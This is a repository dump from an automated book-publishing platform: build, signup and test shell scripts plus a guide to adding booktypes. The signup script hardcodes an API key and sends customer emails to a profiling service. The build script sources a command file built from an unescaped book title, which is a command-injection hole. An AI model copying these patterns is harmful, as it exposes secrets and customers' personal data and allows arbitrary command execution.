--mailtoadmin \"$mailtoadmin\" --summary \"$summary\" --add_this_content \"$add_this_content\" --add_this_content_part_name \"$add_this_content_part_name\" --skyscraper \"$skyscraper\" --expand_seeds_to_pages \"$expand_seeds_to_pages\" --verbose\n\necho \"test $@\"\n\nelse\n\n\techo \"no builder\"\n\nfi\n\nsafe_product_name=$(echo \"$booktitle\" | sed -e 's/[^A-Za-z0-9._-]/_/g')\necho \"safe_product_name is\" \"$safe_product_name\"\n\n\tsendemail -t \"$customer_email\" \\\n\t\t-u \"test build of [ SKU \"$prevsku $booktitle \" ] is attached\" \\\n\t\t-m \"Hi! \\n\\nAttached you will find a free test version of the book that you asked us to add to the catalog. It was created by PageKicker robots running software release $SFB_VERSION on branch\" `git rev-parse --abbrev-ref HEAD` \"on $MACHINE_NAME in $environment. To add this book to your personal account so that you can request free updates in future, you will need to order it via the PageKicker catalog at this URI:\"\\ \"$WEB_HOST\"index.php/\"$prevsku.html. \\n\\n As an additional gesture of appreciation, here is a coupon code for 3 free books: THANKS54. It is early days for us and we very much appreciate your feedback. Please take a moment to share your thoughts via this Google Form: \"$google_form\". Finally, note that PageKicker is open source; we encourage you to contribute to the project, which is available at $MY_GITHUB_REPO .\" \\\n\t\t-f \"$GMAIL_ID\" \\\n\t\t-cc \"$GMAIL_ID\" \\\n\t\t-xu \"$GMAIL_ID\" \\\n\t\t-xp \"$GMAIL_PASSWORD\" \\\n\t\t-s smtp.gmail.com:587 \\\n\t\t-o tls=yes \\\n\t\t-a \"$TMPDIR$uuid/$sku.$safe_product_name\"\".docx\" \\\n\t\t-a \"$TMPDIR$uuid/$sku.$safe_product_name\"\".epub\" \\\n\t\t-a \"$TMPDIR$uuid/$sku.$safe_product_name\"\".mobi\"\n\nif [ \"$mailtoadmin\" = \"yes\" ] ; then\n\n\tsendemail -t \"$mailtoadmin_ids\" \\\n\t\t-u \"test build of [ \"SKU $sku \"\"$booktitle\" ] is attached\" \\\n\t\t-m \"reference copy\" \\\n\t\t-f \"$GMAIL_ID\" \\\n\t\t-xu \"$GMAIL_ID\" \\\n\t\t-xp \"$GMAIL_PASSWORD\" \\\n\t\t-s smtp.gmail.com:587 \\\n\t\t-o tls=yes \\\n\t\t-a \"$TMPDIR$uuid/$sku.$safe_product_name\"\".mobi\"\n\nelse\n\techo \"not mailing to $mailtoadmin_ids\"\n\nfi\n\n\nif [ \"$twitter_announcement\" = \"yes\" ] ; then\n\n echo -n \"t update \" > $TMPDIR$uuid/tcommand\n echo -n \\\" >> $TMPDIR$uuid/tcommand\n echo -n \"New: $booktitle at \"$WEB_HOST\"index.php/$prevsku.html robots #amwriting\" >> $TMPDIR$uuid/tcommand\n echo -n \\\" >> $TMPDIR$uuid/tcommand\n . $TMPDIR$uuid/tcommand\n\nelse\n echo \"no twitter announcement\" | tee --append $sfb_log\n\nfi\n\nif [ \"$fb_announcement\" = \"yes\" ] ; then\n\n facebook-cli post \"robot author #amwriting $booktitle at \\ $WEB_HOST\"index.php/\"$prevsku.html\"\n\nelse\n echo \"no fb notification\" | tee --append $sfb_log\nfi\n\necho 'job ' $uuid 'ending logging at' `date +'%m/%d/%y%n %H:%M:%S'` >> $sfb_log\n\ncat \"$sfb_log\" >> $sfb_log_archive\necho -n \"copied this job's log to the master archive and am now exiting\"\nexit 0\n" }, { "alpha_fraction": 0.6604639291763306, "alphanum_fraction": 0.6709151268005371, "avg_line_length": 22.07647132873535, "blob_id": "f6161c0a5e0c4d2a39614337fa472062f1cfab20", "content_id": "9577a38b7814dee20f3669efd6a7a1b68c51492f", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 3923, "license_type": "permissive", "max_line_length": 211, "num_lines": 170, "path": "/scripts/on_signup.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n\n# script that runs every time a new customer is added to the Magento database\n\n# creates personal bookshelves\n\n# stocks them using API (full contact)\n\necho \"SIGNUP***SIGNUP***SIGNUP***SIGNUP\"\n\nTEXTDOMAIN=SFB\necho $\"hello, world, I am speaking\" $LANG\n\n. ../conf/config.txt\n\necho \"version id number is\" $SFB_VERSION\n\necho \"sfb_log is\" $sfb_log\n\necho \"completed reading config file and beginning logging at\" `date +'%m/%d/%y%n %H:%M:%S'` \n\nstarttime=$(( `date +%s` ))\n\n. includes/set-variables.sh\n\nwhile :\ndo\ncase $1 in\n--help | -\\?)\n\nexit 0 # This is not an error, the user requested help, so do not exit status 1.\n;;\n--passuuid)\npassuuid=$2\nshift 2\n;;\n--passuuid=*)\npassuuid=${1#*=}\nshift\n;;\n--customer_name)\ncustomer_name=$2\nshift 2\n;;\n--customer_name=*)\ncustomer_name=${1#*=}\nshift\n;;\n--customer_email)\ncustomer_email=$2\nshift 2\n;;\n--customer_email=*)\ncustomer_email=${1#*=}\nshift\n;;\n--import)\nimport=$2\nshift 2\n;;\n--import=*)\nimport=${1#*=}\nshift\n;;\n --) # End of all options\n shift\n break\n ;;\n -*)\n echo \"WARN: Unknown option (ignored): $1\" >&2\n shift\n ;;\n *) # no more options. Stop while loop\n break\n ;;\nesac\ndone\n\n# Suppose some options are required. Check that we got them.\n\nif [ ! \"$passuuid\" ] ; then\n\techo \"creating uuid\"\n\tuuid=$(python -c 'import uuid; print uuid.uuid1()')\n\techo \"uuid is\" $uuid | tee --append $xform_log\n\nelse\n\tuuid=\"$passuuid\"\n\techo \"received uuid \" $uuid\n\nfi\n\n# create directories I will need\n\nmkdir -p -m 777 $TMPDIR$uuid\nmkdir -p -m 777 $TMPDIR$uuid/categories\nmkdir -p -m 755 $metadatatargetpath$uuid\n \necho \"metadatatargetpath is \"$tadatatargetpath\necho \"uuid is\" $uuid\n\n# create category id(s)\n\ncatid=`tail -1 < \"$LOCAL_DATA\"\"categories/catid\"`\necho \"catid \" $catid\n\n# writing category import file \n\ncat includes/category_header.csv > $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n. includes/bookshelf-footer.sh >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\ncp $metadatatargetpath$uuid/\"import_bulk_categories.csv\" $TMPDIR$uuid # for testing\n\nif [ \"$import\" = \"yes\" ] ; then \n\n\techo \"adding import job to the manifest\" \n\n\techo $uuid >> import_status/manifest.csv\n\n\n\t$scriptpath\"bin/build_bookshelf.sh\"\n\n\n\t# sendemail -t \"$customer_email\" \\\n\t\t-u \"Public Bookshelf for $customer_name has been added to the PageKicker catalog\" \\\n\t\t-m \"Your public bookshelf has been added to the PageKicker catalog. The URL is:\"\\ \"$WEB_HOST\".html \"It has been prestocked with books created based on interests drawn from your public social media profile.\" \\\n\t\t-f \"$gmail_id\" \\\n\t\t-cc \"$gmail_id\"\\\n\t\t-xu \"$gmail_id\"\\\n\t\t-xp \"$GMAIL_PASSWORD\" \\\n\t\t-s smtp.gmail.com:587 \\\n\t\t-o tls=yes\n\n\t# increment catid by 1\n\n\tprevcatid=$catid\n\tcatid=$((catid+1)) \n\techo $catid >> \"$LOCAL_DATA\"\"categories/catid\"\n\techo \"incremented catid by 1 to\" $catid\" and updated categories/catid\" \n\n\techo 'on_signup.sh job ' $uuid 'ran on' `date +'%m/%d/%y%n %H:%M:%S'` >> $sfb_log\n\nelse\n\n\techo \"not importing this category\" \n\nfi\n\n# get information about customer\n\nFullContactAPIKey=\"8f1d60267f1b859f\"\nAPIendpoint=\"https://api.fullcontact.com/v2/person.xml?email=\"\nAPItxt=\"&apiKey=\"\npersonurl=$APIendpoint$customer_email$APItxt$FullContactAPIKey\necho \"personurl is\" $personurl\ncurl --silent \"$personurl\" > $TMPDIR$uuid/person.xml\n\nxmlstarlet sel -T -t -m \"/person/digitalFootprint/topics/topic/value\" -c . -n $TMPDIR$uuid\"/person.xml\" > $TMPDIR$uuid/topic-seeds\nxmlstarlet sel -T -t -m \"/person/demographics/locationDeduced/normalizedLocation\" -c . -n \"$TMPDIR$uuid\"/person.xml >> $TMPDIR$uuid/topic-seeds\nxmlstarlet sel -T -t -m \"/person/organizations/name\" -c . -n \"$TMPDIR$uuid/person.xml\" >> $TMPDIR$uuid/topic-seeds\n\n\n#safe_product_name=$(echo \"$booktitle\" | sed -e 's/[^A-Za-z0-9._-]/_/g')\n#echo \"safe_product_name is\" \"$safe_product_name\"\n#google_form=\"http://goo.gl/forms/ur1Otr1G2q\"\n\n\n\n\nexit 0\n" }, { "alpha_fraction": 0.7009132504463196, "alphanum_fraction": 0.7009132504463196, "avg_line_length": 53.625, "blob_id": "946357c1f5a3dffefc8e5e573b057144ec6d62e8", "content_id": "c371182700ef86b8415c0c3aa249a0d357dac032", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 438, "license_type": "permissive", "max_line_length": 73, "num_lines": 8, "path": "/test/analyze_url_trek", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# runs test of $analyze_url flag to add web seeds to seed file\nbin/create-catalog-entry.sh --builder \"yes\" --booktitle \"Anton Yelchin \nof Star Trek Dies\" --yourname \"yes\" --jobprofilename \"default\" --import \n\"no\" --seedfile \"/home/fred/scratch/Anton\" --imprint \"pagekicker\" --tldr \n\"Do not leave your car in neutral...\" --editedby \"Trekkie\" --subtitle \n\"An instant book\" --analyze_url \"http://www.cnn.com\" --dontcleanupseeds \n\"yes\"\n\n" }, { "alpha_fraction": 0.6107784509658813, "alphanum_fraction": 0.7065868377685547, "avg_line_length": 19.875, "blob_id": "d31d37f2ab5ed943ed51c09725e53cddc1584776", "content_id": "f021ea7ddee694595635838318ddf3e01b54299e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 167, "license_type": "permissive", "max_line_length": 43, "num_lines": 8, "path": "/scripts/stamper.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "convert \\\n -colorspace RGB \\\n -size 2550x3300 xc:transparent \\\n -fill grey \\\n -pointsize 144\\\n -gravity Center\\\n -annotate +100+30 \"This is an annotation\"\\\n stamp.pdf\n" }, { "alpha_fraction": 0.6751435399055481, "alphanum_fraction": 0.6751435399055481, "avg_line_length": 52, "blob_id": "c18fcb1605b5d0552d3ff4715da70851d6e9141e", "content_id": "aaf0a4f127a5c64c2c4459c7f752632f5653c2c7", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1219, "license_type": "permissive", "max_line_length": 199, "num_lines": 23, "path": "/scripts/includes/acknowledgments.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "cp $scriptpath\"assets/rebuild.md\" \"$TMPDIR$uuid/rebuild.md\"\ncp $confdir\"jobprofiles/signatures/\"$sigfile \"$TMPDIR$uuid/$sigfile\"\necho \"# Acknowledgements from \"\"$imprintname\" \"Robot \"\"$editedby\" >> \"$TMPDIR$uuid/robo_ack.md\"\necho \"I would like to thank \"\"$imprintname\"\" for the opportunity to write this book.\" >> \"$TMPDIR$uuid/robo_ack.md\"\necho \" \" >> \"$TMPDIR$uuid/robo_ack.md\"\necho \" \" >> \"$TMPDIR$uuid/robo_ack.md\"\ncat $scriptpath/assets/robo_ack.md >> \"$TMPDIR$uuid/robo_ack.md\"\necho \"This book was created with revision \"$SFB_VERSION \"on branch\" `git rev-parse --abbrev-ref HEAD` \"of the PageKicker software running on the server $environment. \" >> \"$TMPDIR$uuid/robo_ack.md\"\necho \" \" >> \"$TMPDIR\"$uuid/robo_ack.md\necho \" \" >> \"$TMPDIR\"$uuid/robo_ack.md\n\n# modify acknowledgments based on source -- should become case rather than if\n\n# no active mod options\n\n# complete building acknowledgments\n\necho \" \" >> \"$TMPDIR$uuid/robo_ack.md\"\necho \" \" >> \"$TMPDIR$uuid/robo_ack.md\"\necho '<i>'\"$robot_location\"'</i>' >> \"$TMPDIR$uuid/robo_ack.md\"\necho \" \" >> \"$TMPDIR$uuid/robo_ack.md\"\necho \" \" >> \"$TMPDIR$uuid/robo_ack.md\"\necho '![Robot author photo]'\"($sigfile)\" >> \"$TMPDIR$uuid/robo_ack.md\"\n" }, { "alpha_fraction": 0.7646710276603699, "alphanum_fraction": 0.7706974744796753, "avg_line_length": 73.97777557373047, "blob_id": "4aeae0183e5f43bfcef51d7174e765b6f5feb4ba", "content_id": "6bef6be9a647af90a84ac5573c80b330dfd77981", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 10122, "license_type": "permissive", "max_line_length": 838, "num_lines": 135, "path": "/docs/doc/booktype_creation.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# Adding a new booktype to PageKicker\n\nIn the PageKicker algorithmic publishing platform the **booktype** is an explicit definition of the rules that are used for creating electronic codexes, i.e. content that is wrapped in \"containers\" like pages wrapped in a bound book. **Booktypes** include entities such as anthologies, chapbooks, dictionaries, encyclopedias, epic poems, and novels. Another way of describing such entities is as \"chunk-ables\" that can be published on their own, sufficiently valuable that they can be thrust into the stream of commerce (without a paddle?). At the most practical level, booktypes exist and have evolved over the centuries because they _work._ Following a known format - or inventing a new one! - can make an enormous contribution to the success of author, publisher, and book, and to the happiness of readers, librarians and even critics.\n\nIn PageKicker, booktypes go beyond \"chunk-ables\" such as encyclopedia and include other, lower-level attributes that define structure, substance, and style. Structure is defined in terms of \"parts of the book\" such as acknowledgement, foreword, epigraph, part, chapter, bibliography, and index. Substance is defined by rules that govern the search, creation, and assembly strategy for each part of the book. For example, the substance rule for \"encyclopedia\" might be \"search for all content relevant to the seed phrases and assemble each document in alphabetical order\". Similarly, a rule for style might be \"use the order of parts specified by the Chicago Manual of the Style\". \n\nPageKicker's approach to booktypes is an algorithmic abstraction of an important aspect of traditional publishing. Early in the acquisition and development stage an author or publisher who is contemplating a book on a particular topic for a particular audience must consider what is the best format for the job. The default is usually the standard codex book, i.e. front matter, sequential chapters, back matter, but as noted above there are scores of options that have been developed over 500+ years of publishing. The algorithmic approach enables the publisher to define and continually improve consistent rules for creating books in a particular format. The publisher can also switch from one booktype to another instantly and painlessly experiment with different approaches to the same work.\n\n## Technical Details\n\nThe default booktype is _reader_, which is a codex nonfiction with parts of the book in order as specified in the Chicago Manual of Style, i.e. front matter, body, back matter. One _booktype_ has recently been added, _draft-report_. The purpose of _draft-report_ is to streamline the reader format to only those parts of the book that are helpful in jump-starting the writing of report, i.e. title, an executive summary, content, and bibliography--much reduced front matter.\n\n**Booktype** is one of several hundred variables that the PageKicker system accesses during book creation.\nThe **$booktype** variable is specified at runtime. Like most variables in PageKicker, the order of precedence is (in ascending order), the config file _~/.pagekicker,_ the default variable values file _scripts/includes/set-variables.sh_, and the command line as _--booktype._ Note that the value of **$booktype** provided at the command line can be overridden by values specified in _jobprofiles_ for robots or imprints. Thus, if an imprint file explicitly defines the booktype as always \"encyclopedia\", PageKicker will always create all books for that imprint as encylopedias. For this reason, it is recommended that booktypes should not be specified in imprint files (unless the imprint always publishes one and only one type of book).\n\nWhen the _builder_ script runs, it uses a case statement to look for the value of **$booktype** and run the corresponding script. That booktypes are defined and created by scripts is probably not ideal--it might be better to have them defined strictly as data objects--but on the plus side it does largely isolate the changes. \n\n## Example: Adding a Chapbook\n\nThe procedure for adding a new booktype is relatively straightforward.\n\nThe first step is to add a new clause to the [booktype case construct](https://github.com/fredzannarbor/pagekicker-community/blob/bf0e752097451c8a137829388bfe7da06cd4fa5c/scripts/bin/builder.sh#L1090) in the _builder_ script. The case construct for draft-report looks like this:\n\n```\ndraft-report)\n\techo \"assembling parts needed for $booktype\"\n\n . includes/draft-report.sh\n\t\"$PANDOC_BIN\" \\\n -o \"$TMPDIR$uuid/draft-report-$safe_product_name.docx\" \\\n \"$TMPDIR\"$uuid/draft-report.md\n\n\t# note that draft-report does not get SKU because it is not\n # acompleted product\n ;;\n```\nSo, to add a new case clause for, let us say, a chapbook, the format would look like this:\n\n```\nchapbook)\n echo \"assembling parts needed for $booktype\"\n . includes/chapbook.sh\n \"$PANDOC_BIN\" -o \\\n \"$TMPDIR$uuid/$sku-chapbook-$safe_product_name.epub\" \\\n \"$TMPDIR\"$uuid/chapbook.md\n ;;\n```\nFrom inspecting the above code sample, we see that the _chapbook_ script will reside in _pagekicker-community/scripts/includes_. It need not be a shell script, it could be Python or any other language. The chapbook script has one major responsibility: to return the markdown format file _chapbook.md_ to the assembly area at _$TMPDIR$uuid_, which will then use **pandoc** to convert it into an epub format document. (Additional formats could be created by adding additional pandoc commands with different output extensions). By convention, the book files are named with an SKU followed by a safe product name, which is the literal book title with special characters converted into underscores, e.g. _12345678-The_Plant.epub_. The ;; command concludes the case clause.\n\nSince the _chapbook_ script runs as a sourced include (part of the main script), all defined PageKicker variables are available to it. Since as mentioned above all parts of the book required for _reader_ are built by default, _chapbook_ is only responsible for creating any unique parts needed for a chapbook. \n\nWhile chapbooks have a long history and were created for a wide variety of purposes, the most common modern usage is for small collections of poetry by a single author. Thus, we will assume that the script needs to write a number of poems. Take a look at the [code for _draft-report.sh_](https://github.com/fredzannarbor/pagekicker-community/blob/master/scripts/includes/draft-report.sh), which includes three major parts: comments, part creation, and assembly.\n\nThe script begins by documenting our work.\n\n```\n#!/bin/bash\n# --booktype=\"chapbook\"\n# A specified number of poems are created.\n# There is a limit on word count.\n# Other attributes may be implemented as desired.\n# See http://www.baymoon.com/~ariadne/chapbooks.htm\n# for a helpful guide to possible attributes.\n# The script must return chapbook.md to $TMPDIR$uuid.\n```\nThe script is then responsible for creating its specified parts of the book. In this case, we will assume that the default number of poems is 20 and the default maximum word count is 10,000. For the moment, this will be merely a mockup that uses a hypothetical poem generator. So the second major section of chapbook is responsible for creating the unique substance.\n```\npoems=\"20\"\npoem_max_wordcount=\"10000\"\n\necho \"running poem script\"\n\n$PYTHON_BIN \"poet.py\" --poems \"20\" \\\n--maxwords \"10000\" -o \"$TMPDIR$uuid/poems.md\" \\\n--numbering \"on\"\n\n```\nNow the script must blend its unique content into the material already created by PageKicker, which is defined as follows for the _reader_ booktype.\n\n```\ncat \\\n\"$TMPDIR$uuid/titlepage.md\" \\\n\"$TMPDIR$uuid/robo_ack.md\" \\\n\"$TMPDIR$uuid/settings.md\" \\\n\"$TMPDIR$uuid/rebuild.md\" \\\n\"$TMPDIR$uuid/tldr.md\" \\\n\"$TMPDIR$uuid/listofpages.md\" \\\n\"$TMPDIR$uuid/humansummary.md\" \\\n\"$TMPDIR$uuid/programmaticsummary.md\" \\\n\"$TMPDIR$uuid/add_this_content.md\" \\\n\"$TMPDIR$uuid/chapters.md\" \\\n\"$TMPDIR$uuid/content_collections/content_collections_results.md\" \\\n\"$TMPDIR$uuid/googler.md\" \\\n\"$TMPDIR$uuid/googler-news.md\" \\\n\"$TMPDIR$uuid/sorted_uniqs.md\" \\\n\"$TMPDIR$uuid/analyzed_webpage.md\" \\\n\"$TMPDIR$uuid/acronyms.md\" \\\n\"$TMPDIR$uuid/twitter/sample_tweets.md\" \\\n\"$TMPDIR$uuid/allflickr.md\" \\\n\"$TMPDIR$uuid/sources.md\" \\\n\"$TMPDIR$uuid/changelog.md\" \\\n\"$TMPDIR$uuid/builtby.md\" \\\n\"$TMPDIR$uuid/byimprint.md\" \\\n\"$TMPDIR$uuid/imprint_mission_statement.md\" \\\n\"$TMPDIR$uuid/yaml-metadata.md\" \\\n> \"$TMPDIR$uuid/complete.md\"\n```\nFor the _chapbook_ booktype we can delete many of these sections as either pedantic or irrelevant to the art of poetry. We then add the poems.md part to the list of items that are assembled to make up chapbook.md:\n\n```\n\"$TMPDIR$uuid/titlepage.md\" \\\n\"$TMPDIR$uuid/robo_ack.md\" \\\n\"$TMPDIR$uuid/listofpages.md\" \\\n\"$TMPDIR$uuid/**poems.md\" **\\\n\"$TMPDIR$uuid/changelog.md\" \\\n\"$TMPDIR$uuid/builtby.md\" \\\n\"$TMPDIR$uuid/byimprint.md\" \\\n\"$TMPDIR$uuid/imprint_mission_statement.md\" \\\n\"$TMPDIR$uuid/yaml-metadata.md\" \\\n> \"$TMPDIR$uuid/**chapbook.md\"**\n\necho \"chapbook content\"\n```\n\nThere is no need for an exit status, we simply report completion in the echo statement and control reverts to the appropriate place in bin/builder, i.e. the next step in the case clause, which is the **pandoc** command that builds the chapbook itself.\n\n```\n\"$PANDOC_BIN\" -o \\\n\"$TMPDIR$uuid/$sku-chapbook-$safe_product_name.epub\" \\\n\"$TMPDIR\"$uuid/chapbook.md\n```\n\nThe chapbook file, $sku-chapbook-$safe_product_name.epub, is delivered to the results directory, where the user can access it and additional actions such as delivery and distribution can be carried out.\n\nThis is the basic procedure for adding booktypes. We highly encourage innovation: by all mean, write a script and plug it in! Note that if a booktype script introduces dependencies (as in the hypothetical _poet.py_ program mentioned in the example), the install program _pagekicker-community/simple-install.sh_ should be updated to install those dependencies and the requirements should be documented in _install_notes.md_. Similarly, a test script for the booktype should be added to _test/._\n" }, { "alpha_fraction": 0.6672629714012146, "alphanum_fraction": 0.6690518856048584, "avg_line_length": 42, "blob_id": "69e81a504681cea6fc95a5b65a8f411aaed03205", "content_id": "313b56152c44b3cfee2b985f2b20f95a7a822c69", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 559, "license_type": "permissive", "max_line_length": 83, "num_lines": 13, "path": "/scripts/includes/googler.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "echo \"# Search Engine Snippets\" > $TMPDIR$uuid/googler.md\necho \"\" >> $TMPDIR$uuid/googler.md\necho \"search carried out at $(date -u)\" >> $TMPDIR$uuid/googler.md\necho \"\" >> $TMPDIR$uuid/googler.md\nwhile IFS= read -r seed; do\n echo \"running googler on $seed\" \n echo \"**\"$seed\"**\" >> $TMPDIR$uuid/googler.md\n echo \"\" >> $TMPDIR$uuid/googler.md\n \"$scriptpath\"lib/googler/googler -C --noprompt \"$seed\" >> $TMPDIR$uuid/googler.md\n echo \"\" >> $TMPDIR$uuid/googler.md\n echo \"\" >> $TMPDIR$uuid/googler.md\n sleep 2\ndone < \"$TMPDIR\"$uuid\"/seeds/filtered.pagehits\"\n" }, { "alpha_fraction": 0.7351598143577576, "alphanum_fraction": 0.7351598143577576, "avg_line_length": 42.599998474121094, "blob_id": "04ed162dccaf1fed91546aaaeb451b519c051a20", "content_id": "13268a03222ef8dd6aa3c0d9c3b8b6eeccf79091", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 219, "license_type": "permissive", "max_line_length": 104, "num_lines": 5, "path": "/scripts/includes/text-extraction-from-html.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# extract text \n\n$JAVA_BIN -jar $scriptpath\"lib/tika-app.jar\" -t tmp/$uuid/tmp.cumulative.html > tmp/$uuid/cumulative.txt\n\necho \"completed text extraction from html to tmp/$uuid/cumulative.txt\" | tee --append $sfb_log\n\n" }, { "alpha_fraction": 0.7191011309623718, "alphanum_fraction": 0.7201225757598877, "avg_line_length": 32.75862121582031, "blob_id": "eff2ed80f1af8b98e83ef9b2762a5958cd1a9d83", "content_id": "045c29869a416f314c6146c62c480f263c7379f1", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 979, "license_type": "permissive", "max_line_length": 67, "num_lines": 29, "path": "/scripts/includes/partsofthebook.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# assembling front matter\n# assumes that all files exist but size 0 if not available for book\ncat \\\n\"$TMPDIR$uuid/titlepage.md\" \\\n\"$TMPDIR$uuid/robo_ack.md\" \\\n\"$TMPDIR$uuid/settings.md\" \\\n\"$TMPDIR$uuid/rebuild.md\" \\\n\"$TMPDIR$uuid/tldr.md\" \\\n\"$TMPDIR$uuid/listofpages.md\" \\\n\"$TMPDIR$uuid/humansummary.md\" \\\n\"$TMPDIR$uuid/programmaticsummary.md\" \\\n\"$TMPDIR$uuid/add_this_content.md\" \\\n\"$TMPDIR$uuid/content_collections/content_collections_results.md\" \\\n\"$TMPDIR$uuid/chapters.md\" \\\n\"$TMPDIR$uuid/search_engine_content.md\" \\\n\"$TMPDIR$uuid/googler.md\" \\\n\"$TMPDIR$uuid/googler-news.md\" \\\n\"$TMPDIR$uuid/sorted_uniqs.md\" \\\n\"$TMPDIR$uuid/analyzed_webpage.md\" \\\n\"$TMPDIR$uuid/acronyms.md\" \\\n\"$TMPDIR$uuid/twitter/sample_tweets.md\" \\\n\"$TMPDIR$uuid/allflickr.md\" \\\n\"$TMPDIR$uuid/sources.md\" \\\n\"$TMPDIR$uuid/changelog.md\" \\\n\"$TMPDIR$uuid/builtby.md\" \\\n\"$TMPDIR$uuid/byimprint.md\" \\\n\"$TMPDIR$uuid/imprint_mission_statement.md\" \\\n\"$TMPDIR$uuid/yaml-metadata.md\" \\\n> \"$TMPDIR$uuid/complete.md\"\n" }, { "alpha_fraction": 0.5873016119003296, "alphanum_fraction": 0.682539701461792, "avg_line_length": 30.5, "blob_id": "dae115d20714f6d77ccb11f897e0bef38b45eec8", "content_id": "ea8340230bdd86fde6b1d1f52db57ed9442f9d5c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 63, "license_type": "permissive", "max_line_length": 50, "num_lines": 2, "path": "/test/1001.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\nbin/build_n_books_from_csv.sh ../test/1001_1.csv 1\n" }, { "alpha_fraction": 0.6687977910041809, "alphanum_fraction": 0.681167483329773, "avg_line_length": 20.92987823486328, "blob_id": "fe4a30f717cc6eaa755b41bd84ac23b98b16c4c4", "content_id": "4f3a3ba232b9cf6cac6ce565768353133da5b4c4", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 7195, "license_type": "permissive", "max_line_length": 123, "num_lines": 328, "path": "/scripts/bin/robot-builder.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# builds robot files on receipt of xml payload from webform\n\n# requires directory name and xml file name\necho \"RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR\"\n\nTEXTDOMAIN=SFB # required for bash language awareness\necho $\"hello, world, I am speaking\" $LANG\n\nif [ ! -f \"$HOME\"/.pagekicker/config.txt ]; then\n\techo \"config file not found, creating /home/<user>/.pagekicker, put config file there\"\n\tmkdir -p -m 755 \"$HOME\"/.pagekicker\n\techo \"exiting\"\n\texit 1\nelse\n\t. \"$HOME\"/.pagekicker/config.txt\n\techo \"read config file from $HOME\"\"/.pagekicker/config.txt\"\nfi\n\necho \"software version number is\" $SFB_VERSION\n\necho \"sfb_log is\" $sfb_log\n\necho \"completed reading config file and beginning logging at\" `date +'%m/%d/%y%n %H:%M:%S'` \n\nstarttime=$(( `date +%s` ))\n\n. includes/set-variables.sh\n\nwhile :\ndo\ncase $1 in\n--help | -\\?)\necho \"for help review source code for now\"\nexit 0 # This is not an error, the user requested help, so do not exit status 1.\n;;\n--xmlfilename)\nxmlfilename=$2\nshift 2\n;;\n--xmlfilename=*)\nxmlfilename=${1#*=}\nshift\n;;\n--passuuid)\npassuuid=$2\nshift 2\n;;\n--passuuid=*)\npassuuid=${1#*=}\nshift\n;;\n--storecode)\nstorecode=$2\nshift 2\n;;\n--storecode=*)\nstorecode=${1#*=}\nshift\n;;\n--websites)\nwebsites=$2\nshift 2\n;;\n--websites=*)\nwebsites=${1#*=}\nshift\n;;\n--attribute_set)\nattribute_set=$2\nshift 2\n;;\n--attribute_set=*)\nattribute_set=${1#*=}\nshift\n;;\n--categories)\ncategories=$2\nshift 2\n;;\n--categories=*)\ncategories=${1#*=}\nshift\n;;\n--customerid)\ncustomerid=$2\nshift 2\n;;\n--customerid=*)\ncustomerid=${1#*=}\nshift\n;;\n--storeids)\nstoreids=$2\nshift 2\n;;\n--storeids=*)\nstoreids=${1#*=}\nshift\n;;\n--exemplar_file)\nexemplar_file=$2\nshift 2\n;;\n--exemplar_file=*)\nexemplar_file=${1#*=}\nshift\n;;\n--jobprofilename)\njobprofilename=$2\nshift 2\n;;\n--jobprofilename=*)\njobprofilename=${1#*=}\nshift\n;;\n--wikilang)\nwikilang=$2\nshift 2\n;;\n--wikilang=*)\nwikilang=${1#*=}\nshift\n;;\n--covercolor)\ncovercolor=$2\nshift 2\n;;\n--covercolor=*)\ncovercolor=${1#*=}\nshift\n;;\n--coverfont)\ncoverfont=$2\nshift 2\n;;\n--coverfont=*)\ncoverfont=${1#*=}\nshift\n;;\n--revenue_share)\nrevenue_share=$2\nshift 2\n;;\n--revenue_share=*)\nrevenue_share=${1#*=}\nshift\n;;\n--imprint)\nimprint=$2\nshift 2\n;;\n--imprint=*)\nimprint=${1#*=}\nshift\n;;\n--tldr)\ntldr=$2\nshift 2\n;;\n--format=*)\nformat=${1#*=}\nshift\n;;\n--import)\nimport=$2\nshift 2\n;;\n--import=*)\nimport=${1#*=}\nshift\n;;\n--batch_uuid)\nbatch_uuid=$2\nshift 2\n;;\n--batch_uuid=*)\nbatch_uuid=${1#*=}\nshift\n;;\n--editedby)\neditedby=$2\nshift 2\n;;\n--editedby=*)\neditedby=${1#*=}\nshift\n;;\n--add_corpora)\nadd_corpora=$2\nshift 2\n;;\n--add_corpora=*)\nadd_corporaa=${1#*=}\nshift\n;;\n--analyze_url)\nanalyze_url=$2\nshift 2\n;;\n--analyze_url=*)\nanalyze_url=${1#*=}\nshift\n;;\n --) # End of all options\n shift\n break\n 